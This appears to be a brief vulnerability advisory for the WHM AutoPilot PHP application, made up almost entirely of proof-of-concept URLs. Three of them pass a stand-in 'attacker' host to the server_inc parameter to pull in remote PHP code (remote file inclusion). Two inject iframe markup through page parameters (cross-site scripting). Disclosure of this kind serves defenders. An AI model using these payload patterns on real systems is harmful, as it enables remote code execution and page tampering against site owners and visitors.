Benchmark Designs WHM AutoPilot Multiple Remote Vulnerabilities

Benchmark Designs WHM AutoPilot Multiple Remote Vulnerabilities

An exploit is not required.

The following proof of concept examples are available:
http://www.example.com/inc/header.php/step_one.php?server_inc=http://attacker/step_one_
tables.php

http://www.example.com/inc/step_one_tables.php?server_inc=http://attacker/js_functions.
php

http://www.example.com/inc/step_two_tables.php?server_inc=http://attacker/js_functions.
php

http://www.example.com/inc/header.php?site_title=%3C/title%3E%3Ciframe%3E

http://www.example.com/admin/themes/blue/header.php?http_images='%3E%3Ciframe%3E